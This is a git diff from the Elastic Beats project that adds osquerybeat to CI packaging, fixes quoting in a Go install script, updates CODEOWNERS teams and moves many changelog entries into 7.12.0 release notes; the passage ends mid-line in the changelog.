diff --git a/.ci/packaging.groovy b/.ci/packaging.groovy index a1e1ffbae3a..6b41838ce45 100644 --- a/.ci/packaging.groovy +++ b/.ci/packaging.groovy @@ -115,6 +115,7 @@ pipeline { 'x-pack/heartbeat', // 'x-pack/journalbeat', 'x-pack/metricbeat', + 'x-pack/osquerybeat', 'x-pack/packetbeat', 'x-pack/winlogbeat' ) @@ -290,6 +291,8 @@ def pushCIDockerImages(Map args = [:]) { tagAndPush(beatName: 'journalbeat', arch: arch) } else if (env?.BEATS_FOLDER?.endsWith('metricbeat')) { tagAndPush(beatName: 'metricbeat', arch: arch) + } else if (env?.BEATS_FOLDER?.endsWith('osquerybeat')) { + tagAndPush(beatName: 'osquerybeat', arch: arch) } else if ("${env.BEATS_FOLDER}" == "packetbeat"){ tagAndPush(beatName: 'packetbeat', arch: arch) } else if ("${env.BEATS_FOLDER}" == "x-pack/elastic-agent") { diff --git a/.ci/scripts/install-go.sh b/.ci/scripts/install-go.sh index eb31aee8433..31566c08726 100755 --- a/.ci/scripts/install-go.sh +++ b/.ci/scripts/install-go.sh @@ -11,13 +11,15 @@ GVM_CMD="${HOME}/bin/gvm" if command -v go then + set +e echo "Found Go. Checking version.." FOUND_GO_VERSION=$(go version|awk '{print $3}'|sed s/go//) - if [ $FOUND_GO_VERSION == $GO_VERSION ] + if [ "$FOUND_GO_VERSION" == "$GO_VERSION" ] then echo "Versions match. No need to install Go. Exiting." exit 0 fi + set -e fi if [ "${ARCH}" == "aarch64" ] ; then diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index b33de28e355..592495030dc 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -13,12 +13,12 @@ # /winlogbeat/ @elastic/beats # Auditbeat -/auditbeat/module/ @elastic/siem -/x-pack/auditbeat/ @elastic/siem +/auditbeat/module/ @elastic/security-external-integrations +/x-pack/auditbeat/ @elastic/security-external-integrations # Packetbeat -/packetbeat/protos/ @elastic/siem -/x-pack/packetbeat/ @elastic/siem +/packetbeat/protos/ @elastic/security-external-integrations +/x-pack/packetbeat/ @elastic/security-external-integrations # Filebeat # /filebeat/module/ @elastic/integrations @@ -26,7 +26,7 @@ # /filebeat/module/kibana/ @elastic/stack-monitoring # /filebeat/module/logstash/ @elastic/stack-monitoring # /x-pack/filebeat/module/ @elastic/integrations -# /x-pack/filebeat/module/suricata/ @elastic/secops +# /x-pack/filebeat/module/suricata/ @elastic/security-external-integrations # Metricbeat # /metricbeat/module/ @elastic/integrations @@ -40,7 +40,7 @@ /heartbeat/ @elastic/uptime # Winlogbeat -/x-pack/winlogbeat/ @elastic/siem +/x-pack/winlogbeat/ @elastic/security-external-integrations # CI Specific /.ci/ @elastic/observablt-robots diff --git a/CHANGELOG-developer.next.asciidoc b/CHANGELOG-developer.next.asciidoc index d34704ecaac..8dbeb193b79 100644 --- a/CHANGELOG-developer.next.asciidoc +++ b/CHANGELOG-developer.next.asciidoc @@ -110,3 +110,4 @@ The list below covers the major changes between 7.0.0-rc2 and master only. - Update Go version to 1.15.7. {pull}22495[22495] - Update Go version to 1.15.8. {pull}23955[23955] - Update Go version to 1.15.9. {pull}24442[24442] +- Update Go version to 1.15.10. {pull}24606[24606] diff --git a/CHANGELOG.asciidoc b/CHANGELOG.asciidoc index 51c0f1f8aea..68d0f9291af 100644 --- a/CHANGELOG.asciidoc +++ b/CHANGELOG.asciidoc @@ -3,6 +3,166 @@ :issue: https://github.com/elastic/beats/issues/ :pull: https://github.com/elastic/beats/pull/ +[[release-notes-7.12.0]] +=== Beats version 7.12.0 +https://github.com/elastic/beats/compare/v7.11.2...v7.12.0[View commits] + +==== Breaking changes + +*Filebeat* + +- Rename `s3` input to `aws-s3` input. {pull}23469[23469] + +*Heartbeat* + +- Refactor synthetics configuration to new syntax. {pull}23467[23467] + +==== Bugfixes + +*Affecting all Beats* + +- Fix `nested` subfield handling in generated Elasticsearch templates. {issue}23178[23178] {pull}23183[23183] +- Fix CPU usage metrics on VMs with dynamic CPU config {pull}23154[23154] +- Allow configuring credential_profile_name and shared_credential_file when using role_arn. {pull}24174[24174] +- Fix panic with inline SSL when the certificate or key was smaller than 256 bytes. {issue}23820[23820] {pull}23858[23858] + +*Auditbeat* + +- system/login: Fixed offset reset on inode reuse. {pull}24414[24414] +- system/login: Add additional offset check for utmp files. {pull}24515[24515] + +*Filebeat* + +- CheckPoint Firewall module: Change event.severity JSON data type to a number because the field mapping is a `long`. {pull}23424[23424] +- Cisco IOS: Change icmp.type/code and igmp.type JSON data types to strings because the fields mappings are `keyword`. {pull}23424[23424] +- CrowdStrike Falcon: Change JSON field types to match the field mappings. {pull}23424[23424] +- Fortinet Firewall: Drop `fortinet.firewall.assignip` when the value is "N/A". {pull}23424[23424] +- Juniper SRX: Change JSON field types to match the field mappings. {pull}23424[23424] +- Suricata EVE: Convert `suricata.eve.flow_id` to string because the field is a keyword in the mapping. {pull}23424[23424] +- Zeek DNS: Ignore failures in data type conversions. And change `dns.id` JSON field to a string to match its `keyword` mapping. {pull}23424[23424] +- Update `filestream` reader offset when a line is skipped. {pull}23417[23417] +- Add check for empty values in azure module. {pull}24156[24156] +- Change the `event.created` in Netflow events to be the time the event was created by Filebeat +- Fix Zoom module parameters for basic auth and url path. {pull}23779[23779] +- Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] +- Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] +- Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] +- aws/s3access dataset was populating event.duration using the wrong unit. {pull}23920[23920] +- Zoom module pipeline failed to ingest some chat_channel events. {pull}23904[23904] +- Fix Netlow module issue with missing `internal_networks` config parameter. {issue}24094[24094] {pull}24110[24110] +- in httpjson input using encode_as "application/x-www-form-urlencoded" now sets Content-Type correctly {issue}24331[24331] {pull}24336[24336] +- Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] + +*Metricbeat* + +- Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] +- Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] +- Unskip s3_request integration test. {pull}23887[23887] +- Add system.hostfs configuration option for system module. {pull}23831[23831] + +==== Added + +*Affecting all Beats* + +- Honor kube event resysncs to handle missed watch events {pull}22668[22668] +- Add autodiscover provider and metadata processor for Nomad. {pull}14954[14954] {pull}23324[23324] +- Add `processors.rate_limit.n.dropped` monitoring counter metric for the `rate_limit` processor. {pull}23330[23330] +- Deprecate aws_partition config parameter for AWS, use endpoint instead. {pull}23539[23539] +- Update the baseline version of Sarama (Kafka support library) to 1.27.2. {pull}23595[23595] +- Add kubernetes.volume.fs.used.pct field. {pull}23564[23564] +- Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] +- Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] +- Add deployment name in pod's meta. {pull}23610[23610] +- Added ECS 1.8 `host.os.type` field to `add_host_metadata` processor. {pull}23513[23513] +- Add `selector` information in Kubernetes services' metadata. {pull}23730[23730] + +*Auditbeat* + +- Improve file_integrity monitoring when a file is created/deleted in quick succession. {issue}17347[17347] {pull}22170[22170] +- system/host: Add new ECS 1.8 field `os.type` in `host.os.type`. {pull}23513[23513] +- Update Auditbeat auditd module to ECS 1.8 {pull}23594[23594] {issue}23118[23118] + +*Filebeat* + +- Add parsing of tcp flags to AWS vpcflow fileset {issue}228020[22820] {pull}23157[23157] +- Added support for first_event context in Filebeat httpjson input {pull}23437[23437] +- Adding Threat Intel module {pull}21795[21795] +- Added username parsing from Cisco ASA message 302013. {pull}21196[21196] +- Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] +- Added feature to modules to adapt Ingest Node pipelines for compatibility with older Elasticsearch versions by removing unsupported processors. {pull}23763[23763] +- Added support for Cisco AMP API as a new fileset. {pull}22768[22768] +- Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] +- Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] +- Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] +- Move aws-s3 input to GA. {pull}23631[23631] +- Populate `source.mac` and `destination.mac` for Suricata EVE events. {issue}23706[23706] {pull}23721[23721] +- Added string splitting for httpjson input {pull}24022[24022] +- Added Signatures fileset to Zeek module {pull}23772[23772] +- Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. {pull}23819[23819] +- Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] +- Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] {pull}23875[23875] +- Update Filebeat auditd dataset to ECS 1.8.0. {pull}23723[23723] {issue}23118[23118] +- Updated microsoft defender_atp and m365_defender to ECS 1.8. {pull}23897[23897] {issue}23118[23118] +- Updated o365 module to ECS 1.8. {issue}23118[23118] {pull}23896[23896] +- Upgrade CEF module to ECS 1.8.0. {pull}23832[23832] +- Upgrade fortinet/firewall to ECS 1.8 {issue}23118[23118] {pull}23902[23902] +- Upgrade Zeek to ECS 1.8.0. {issue}23118[23118] {pull}23847[23847] +- Updated azure module to ECS 1.8. {issue}23118[23118] {pull}23927[23927] +- Update aws/s3access to ECS 1.8. {issue}23118[23118] {pull}23920[23920] +- Upgrade panw module to ECS 1.8 {issue}23118[23118] {pull}23931[23931] +- Updated aws/cloudtrail fileset to ECS 1.8. {issue}23118[23118] {pull}23911[23911] +- Upgrade juniper/srx to ECS 1.8.0. {issue}23118[23118] {pull}23936[23936] +- Update mysqlenterprise module to ECS 1.8. {issue}23118[23118] {pull}23978[23978] +- Upgrade sophos/xg fileset to ECS 1.8.0. {issue}23118[23118] {pull}23967[23967] +- Upgrade system/auth to ECS 1.8 {issue}23118[23118] {pull}23961[23961] +- Upgrade elasticsearch/audit to ECS 1.8 {issue}23118[23118] {pull}24000[24000] +- Upgrade okta to ECS 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] +- Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] +- Add fileset to ingest PostgreSQL CSV logs. {pull}23334[23334] + +*Heartbeat* + +- Bundle synthetics dependencies with Heartbeat docker image. {pull}23274[23274] + +*Heartbeat* + +- Update Journalbeat to ECS 1.8. {pull}23737[23737] + +*Metricbeat* + +- Enrich events of `state_service` metricset with Kubernetes services' metadata. {pull}23730[23730] +- Add support for Darwin/arm M1. {pull}24019[24019] +- Check fields are documented in AWS metricsets. {pull}23887[23887] +- Add container.image.name and containe.name ECS fields for state_container. {pull}23802[23802] +- Add support for the MemoryPressure, DiskPressure, OutOfDisk and PIDPressure status conditions in state_node. {pull}23905[23905] + +*Packetbeat* + +- Upgrade to ECS 1.8.0. {pull}23783[23783] +- Add `event.type: [connection]` to flow events and include `end` for final flows. {pull}24564[24564] + +*Functionbeat* + +- Provide more ways to set AWS credentials. {issue}12464[12464] {pull}23344[23344] +- Add support for multiple regions {pull}21065[21065] + +*Heartbeat* + +- Add support for script processor. {pull}23229[23229] + +*Winlogbeat* + +- Add Audit and Authentication Policy Change Events and related.ip information {pull}20684[20684] +- Add new ECS 1.8 improvements. {pull}23563[23563] +- Remove deprecated eventlogging API that was used for Windows XP/2003 and associated unused code. {pull}24463[24463] + +==== Deprecated + +*Affecting all Beats* + +- Selecting `full` in `ssl.verification_mode` option will not treat CommonName field in x509 certificates as a hostname when Subject Alternative Name is not present from v8.0. Please update your certificates so it contains at least one DNSName instead of relying on CommonName in the new major version of Beats. + + [[release-notes-7.11.2]] === Beats version 7.11.2 https://github.com/elastic/beats/compare/v7.11.1...v7.11.2[View commits] diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 44ddadada89..93bae39ef96 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -31,8 +31,9 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - API address is a required setting in `add_cloudfoundry_metadata`. {pull}21759[21759] - Update to ECS 1.7.0. {pull}22571[22571] - Add support for SCRAM-SHA-512 and SCRAM-SHA-256 in Kafka output. {pull}12867[12867] -- Fix panic with inline SSL when the certificate or key were small than 256 bytes. {pull}23820[23820] - Use alias to report container image in k8s metadata. {pull}24380[24380] +- Set `cleanup_timeout` to zero by default in docker and kubernetes autodiscover in all beats except Filebeat where it is kept to 60 seconds. {pull}24681[24681] +- Update to ECS 1.9.0. {pull}24909[24909] *Auditbeat* @@ -49,7 +50,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Filebeat* -- Add fileset to ingest PostgreSQL CSV logs. {pull}23334[23334] - Fix parsing of Elasticsearch node name by `elasticsearch/slowlog` fileset. {pull}14547[14547] - Improve ECS field mappings in panw module. event.outcome now only contains success/failure per ECS specification. {issue}16025[16025] {pull}17910[17910] - Improve ECS categorization field mappings for nginx module. http.request.referrer only populated when nginx sets a value {issue}16174[16174] {pull}17844[17844] @@ -103,12 +103,10 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Rename bad ECS field name tracing.trace.id to trace.id in aws elb fileset. {pull}22571[22571] - Fix parsing issues with nested JSON payloads in Elasticsearch audit log fileset. {pull}22975[22975] - Rename `network.direction` values in crowdstrike/falcon to `ingress`/`egress`. {pull}23041[23041] -- Rename `s3` input to `aws-s3` input. {pull}23469[23469] - Possible values for Netflow's locality fields (source.locality, destination.locality and flow.locality) are now `internal` and `external`, instead of `private` and `public`. {issue}24272[24272] {pull}24295[24295] +- Add User Agent Parser for Azure Sign In Logs Ingest Pipeline {pull}23201[23201] *Heartbeat* -- Adds negative body match. {pull}20728[20728] -- Refactor synthetics configuration to new syntax. {pull}23467[23467] *Journalbeat* @@ -234,14 +232,14 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Use PROGRAMDATA environment variable instead of C:\ProgramData for windows install service {pull}22874[22874] - Fix reporting of cgroup metrics when running under Docker {pull}22879[22879] - Fix typo in config docs {pull}23185[23185] -- Fix `nested` subfield handling in generated Elasticsearch templates. {issue}23178[23178] {pull}23183[23183] -- Fix CPU usage metrics on VMs with dynamic CPU config {pull}23154[23154] - Add FAQ entry for madvdontneed variable {pull}23429[23429] - Fix panic due to unhandled DeletedFinalStateUnknown in k8s OnDelete {pull}23419[23419] - Fix error loop with runaway CPU use when the Kafka output encounters some connection errors {pull}23484[23484] -- Allow configuring credential_profile_name and shared_credential_file when using role_arn. {pull}24174[24174] +- Fix ILM setup log reporting that a policy or an alias was created, even though the creation of any resource was disabled. {issue}24046[24046] {pull}24480[24480] +- Fix ILM alias not being created if `setup.ilm.check_exists: false` and `setup.ilm.overwrite: true` has been configured. {pull}24480[24480] - Fix issue discovering docker containers and metadata after reconnections {pull}24318[24318] - Allow cgroup self-monitoring to see alternate `hostfs` paths {pull}24334[24334] +- Fix 'make setup' instructions for a new beat {pull}24944[24944] *Auditbeat* @@ -263,8 +261,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - system/socket: Fixed start failure when run under config reloader. {issue}20851[20851] {pull}21693[21693] - system/socket: Having some CPUs unavailable to Auditbeat could cause startup errors or event loss. {pull}22827[22827] - Note incompatibility of system/socket on ARM. {pull}23381[23381] -- system/login: Fixed offset reset on inode reuse. {pull}24414[24414] -- system/login: Add additional offset check for utmp files. {pull}24515[24515] *Filebeat* @@ -280,17 +276,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix a connection error in httpjson input. {pull}16123[16123] - Fix integer overflow in S3 offsets when collecting very large files. {pull}22523[22523] - Fix CredentialsJSON unpacking for `gcp-pubsub` and `httpjson` inputs. {pull}23277[23277] -- CheckPoint Firewall module: Change event.severity JSON data type to a number because the field mapping is a `long`. {pull}23424[23424] -- Cisco IOS: Change icmp.type/code and igmp.type JSON data types to strings because the fields mappings are `keyword`. {pull}23424[23424] -- CrowdStrike Falcon: Change JSON field types to match the field mappings. {pull}23424[23424] -- Fortinet Firewall: Drop `fortinet.firewall.assignip` when the value is "N/A". {pull}23424[23424] -- Juniper SRX: Change JSON field types to match the field mappings. {pull}23424[23424] -- Suricata EVE: Convert `suricata.eve.flow_id` to string because the field is a keyword in the mapping. {pull}23424[23424] -- Zeek DNS: Ignore failures in data type conversions. And change `dns.id` JSON field to a string to match its `keyword` mapping. {pull}23424[23424] -- Change the `event.created` in Netflow events to be the time the event was created by Filebeat - to be consistent with ECS. {pull}23094[23094] -- Update `filestream` reader offset when a line is skipped. {pull}23417[23417] -- Add check for empty values in azure module. {pull}24156[24156] *Filebeat* @@ -373,11 +358,11 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix checkpoint module when logs contain time field. {pull}20567[20567] - Add field limit check for AWS Cloudtrail flattened fields. {pull}21388[21388] {issue}21382[21382] - Fix syslog RFC 5424 parsing in the CheckPoint module. {pull}21854[21854] -- Add json body check for sqs message. {pull}21727[21727] - Fix incorrect connection state mapping in zeek connection pipeline. {pull}22151[22151] {issue}22149[22149] - Fix handing missing eventtime and assignip field being set to N/A for fortinet module. {pull}22361[22361] - Fix Zeek dashboard reference to `zeek.ssl.server.name` field. {pull}21696[21696] - Fix for `field [source] not present as part of path [source.ip]` error in azure pipelines. {pull}22377[22377] +- Properly update offset in case of unparasable line. {pull}22685[22685] - Drop aws.vpcflow.pkt_srcaddr and aws.vpcflow.pkt_dstaddr when equal to "-". {pull}22721[22721] {issue}22716[22716] - Fix cisco umbrella module config by adding input variable. {pull}22892[22892] - Fix network.direction logic in zeek connection fileset. {pull}22967[22967] @@ -389,26 +374,24 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Simplify regex for organization custom prefix in AWS/CloudTrail fileset. {issue}23203[23203] {pull}23204[23204] - Fix syslog header parsing in infoblox module. {issue}23272[23272] {pull}23273[23273] - Fix concurrent modification exception in Suricata ingest node pipeline. {pull}23534[23534] -- Fix Zoom module parameters for basic auth and url path. {pull}23779[23779] - Fix handling of ModifiedProperties field in Office 365. {pull}23777[23777] -- Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] -- Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] -- Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] -- aws/s3access dataset was populating event.duration using the wrong unit. {pull}23920[23920] -- Zoom module pipeline failed to ingest some chat_channel events. {pull}23904[23904] -- Fix Netflow module issue with missing `internal_networks` config parameter. {issue}24094[24094] {pull}24110[24110] -- in httpjson input using encode_as "application/x-www-form-urlencoded" now sets Content-Type correctly {issue}24331[24331] {pull}24336[24336] - Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] -- Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] +- Fix Cisco ASA parser for message 722051. {pull}24410[24410] +- Fix `google_workspace` pagination. {pull}24668[24668] +- Fix Cisco ASA parser for message 302022. {issue}24405[24405] {pull}24697[24697] +- Fix Cisco AMP `@metadata._id` calculation {issue}24717[24717] {pull}24718[24718] +- Fix gcp/vpcflow module error where input type was defaulting to file. {pull}24719[24719] +- Fix date parsing in GSuite/login and Google Workspace/login filesets. {issue}24694[24694] +- Fix date parsing in GSuite/login fileset. {issue}24694[24694] +- Improve Cisco ASA/FTD parsing of messages - better support for identity FW messages. Change network.bytes, source.bytes, and destination.bytes to long from integer since value can exceed integer capacity. Add descriptions for various processors for easier pipeline editing in Kibana UI. {pull}23766[23766] +- Updating Oauth2 flow for m365_defender fileset. {pull}24829[24829] +- Improve PanOS parsing and ingest pipeline. {issue}22413[22413] {issue}22748[22748] {pull}24799[24799] *Heartbeat* - Fixed excessive memory usage introduced in 7.5 due to over-allocating memory for HTTP checks. {pull}15639[15639] - Fixed TCP TLS checks to properly validate hostnames, this broke in 7.x and only worked for IP SANs. {pull}17549[17549] -*Heartbeat* - - *Journalbeat* @@ -514,14 +497,13 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix remote_write flaky test. {pull}21173[21173] - Remove io.time from windows {pull}22237[22237] - Change vsphere.datastore.capacity.used.pct value to betweeen 0 and 1. {pull}23148[23148] +- Fix incorrect types of fields GetHits and Ops in NodeInterestingStats for Couchbase module in Metricbeat {issue}21021[21021] {pull}23287[23287] - Update config in `windows.yml` file. {issue}23027[23027]{pull}23327[23327] -- Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] - Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] -- Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] -- Unskip s3_request integration test. {pull}23887[23887] -- Add system.hostfs configuration option for system module. {pull}23831[23831] - Fix GCP not able to request Cloudfunctions metrics if a region filter was set {pull}24218[24218] - Fix type of `uwsgi.status.worker.rss` type. {pull}24468[24468] +- Ignore unsupported derive types for filesystem metricset. {issue}22501[22501] {pull}24502[24502] +- Accept text/plain type by default for prometheus client scraping. {pull}24622[24622] *Packetbeat* @@ -616,17 +598,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added "add_network_direction" processor for determining perimeter-based network direction. {pull}23076[23076] - Added new `rate_limit` processor for enforcing rate limits on event throughput. {pull}22883[22883] - Allow node/namespace metadata to be disabled on kubernetes metagen and ensure add_kubernetes_metadata honors host {pull}23012[23012] -- Honor kube event resysncs to handle missed watch events {pull}22668[22668] -- Add autodiscover provider and metadata processor for Nomad. {pull}14954[14954] {pull}23324[23324] -- Add `processors.rate_limit.n.dropped` monitoring counter metric for the `rate_limit` processor. {pull}23330[23330] -- Deprecate aws_partition config parameter for AWS, use endpoint instead. {pull}23539[23539] -- Update the baseline version of Sarama (Kafka support library) to 1.27.2. {pull}23595[23595] -- Add kubernetes.volume.fs.used.pct field. {pull}23564[23564] -- Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] -- Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] -- Add deployment name in pod's meta. {pull}23610[23610] -- Added ECS 1.8 `host.os.type` field to `add_host_metadata` processor. {pull}23513[23513] -- Add `selector` information in kubernetes services' metadata. {pull}23730[23730] +- Add `wineventlog` schema to `decode_xml` processor. {issue}23910[23910] {pull}24726[24726] *Auditbeat* @@ -644,11 +616,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add file integrity module ECS categorization fields. {pull}18012[18012] - Add `file.mime_type`, `file.extension`, and `file.drive_letter` for file integrity module. {pull}18012[18012] - Add ECS categorization info for auditd module {pull}18596[18596] -- Add several improvements for auditd module for improved ECS field mapping {pull}22647[22647] -- Add ECS 1.7 `configuration` categorization in certain events in auditd module. {pull}23000[23000] -- Improve file_integrity monitoring when a file is created/deleted in quick succession. {issue}17347[17347] {pull}22170[22170] -- system/host: Add new ECS 1.8 field `os.type` in `host.os.type`. {pull}23513[23513] -- Update Auditbeat auditd module to ECS 1.8 {pull}23594[23594] {issue}23118[23118] *Filebeat* @@ -843,56 +810,25 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Misp improvements: Migration to httpjson v2 config, pagination and deduplication ID {pull}23070[23070] - Add Google Workspace module and mark Gsuite module as deprecated {pull}22950[22950] - Mark m365 defender, defender atp, okta and google workspace modules as GA {pull}23113[23113] -- Added support for first_event context in filebeat httpjson input {pull}23437[23437] -- Add parsing of tcp flags to AWS vpcflow fileset {issue}228020[22820] {pull}23157[23157] - Added `alternative_host` option to google pubsub input {pull}23215[23215] -- Adding Threat Intel module {pull}21795[21795] -- Added username parsing from Cisco ASA message 302013. {pull}21196[21196] -- Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] -- Added support for Cisco AMP API as a new fileset. {pull}22768[22768] -- Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] -- Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] -- Move aws-s3 input to GA. {pull}23631[23631] -- Populate `source.mac` and `destination.mac` for Suricata EVE events. {issue}23706[23706] {pull}23721[23721] -- Added feature to modules to adapt Ingest Node pipelines for compatibility with older Elasticsearch versions by - removing unsupported processors. {pull}23763[23763] -- Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] -- Added string splitting for httpjson input {pull}24022[24022] -- Added field mappings for Netflow/IPFIX vendor fields that are known to Filebeat. {issue}23771[23771] -- Added Signatures fileset to Zeek module {pull}23772[23772] -- Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. {pull}23819[23819] -- Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] -- Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] {pull}23875[23875] -- Update Filebeat auditd dataset to ECS 1.8.0. {pull}23723[23723] {issue}23118[23118] -- Updated microsoft defender_atp and m365_defender to ECS 1.8. {pull}23897[23897] {issue}23118[23118] -- Updated o365 module to ECS 1.8. {issue}23118[23118] {pull}23896[23896] -- Upgrade CEF module to ECS 1.8.0. {pull}23832[23832] -- Upgrade fortinet/firewall to ECS 1.8 {issue}23118[23118] {pull}23902[23902] -- Upgrade Zeek to ECS 1.8.0. {issue}23118[23118] {pull}23847[23847] -- Updated azure module to ECS 1.8. {issue}23118[23118] {pull}23927[23927] -- Update aws/s3access to ECS 1.8. {issue}23118[23118] {pull}23920[23920] -- Upgrade panw module to ecs 1.8 {issue}23118[23118] {pull}23931[23931] -- Updated aws/cloudtrail fileset to ECS 1.8. {issue}23118[23118] {pull}23911[23911] -- Upgrade juniper/srx to ecs 1.8.0. {issue}23118[23118] {pull}23936[23936] -- Update mysqlenterprise module to ECS 1.8. {issue}23118[23118] {pull}23978[23978] -- Upgrade sophos/xg fileset to ECS 1.8.0. {issue}23118[23118] {pull}23967[23967] -- Upgrade system/auth to ECS 1.8 {issue}23118[23118] {pull}23961[23961] -- Upgrade elasticsearch/audit to ECS 1.8 {issue}23118[23118] {pull}24000[24000] -- Upgrade okta to ecs 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] -- Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] - Support X-Forwarder-For in IIS logs. {pull}19142[192142] - +- Add support for logs generated by servers configured with `log_statement` and `log_duration` in PostgreSQL module. {pull}24607[24607] +- Updating field mappings for Cisco AMP module, fixing certain fields. {pull}24661[24661] +- Added NTP fileset to Zeek module {pull}24224[24224] +- Add `proxy_url` config for httpjson v2 input. {issue}24615[24615] {pull}24662[24662] +- Add support for upper case field names in Sophos XG module {pull}24693[24693] +- Add `fail_on_template_error` option for httpjson input. {pull}24784[24784] +- Change `okta.target` to `flattened` field type. {issue}24354[24354] {pull}24636[24636] *Heartbeat* - Add mime type detection for http responses. {pull}22976[22976] -- Bundle synthetics deps with heartbeat docker image. {pull}23274[23274] - Handle datastreams for fleet. {pull}24223[24223] - Add --sandbox option for browser monitor. {pull}24172[24172] +- Support additional 'root' fields from synthetics. {pull}24770[24770] *Journalbeat* -- Update Journalbeat to ECS 1.8. {pull}23737[23737] *Metricbeat* @@ -1013,11 +949,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Move IIS module to GA and map fields. {issue}22609[22609] {pull}23024[23024] - Apache: convert status.total_kbytes to status.total_bytes in fleet mode. {pull}23022[23022] - Release MSSQL as GA {pull}23146[23146] -- Enrich events of `state_service` metricset with kubernetes services' metadata. {pull}23730[23730] -- Add support for Darwin/arm M1. {pull}24019[24019] -- Check fields are documented in aws metricsets. {pull}23887[23887] -- Add support for defining metrics_filters for prometheus module in hints. {pull}24264[24264] -- Add support for PostgreSQL 10, 11, 12 and 13. {pull}24402[24402] +- Add support for SASL/SCRAM authentication to the Kafka module. {pull}24810[24810] *Packetbeat* @@ -1032,6 +964,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Tuned the internal queue size to reduce the chances of events being dropped. {pull}22650[22650] - Add support for "http.request.mime_type" and "http.response.mime_type". {pull}22940[22940] - Upgrade to ECS 1.8.0. {pull}23783[23783] +- Add `event.type: [connection]` to flow events and include `end` for final flows. {pull}24564[24564] *Functionbeat* @@ -1042,7 +975,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Heartbeat* -- Add support for script processor. {pull}23229[23229] *Winlogbeat* @@ -1057,9 +989,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add additional event categorization for security and sysmon modules. {pull}22988[22988] - Add dns.question.subdomain fields for sysmon DNS events. {pull}22999[22999] - Add dns.question.top_level_domain fields for sysmon DNS events. {pull}23046[23046] -- Add Audit and Authentication Polixy Change Events and related.ip information {pull}20684[20684] -- Add new ECS 1.8 improvements. {pull}23563[23563] -- Remove deprecated eventlogging api that was used for Windows XP/2003 and associated unused code. {pull}24463[24463] *Elastic Log Driver* @@ -1070,10 +999,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Affecting all Beats* -- Selecting `full` in `ssl.verification_mode` option will not treat CommonName field in x509 certificates as - a hostname when Subject Alternative Name is not present from v8.0. - Please update your certificates so it contains at least one DNSName instead of relying on 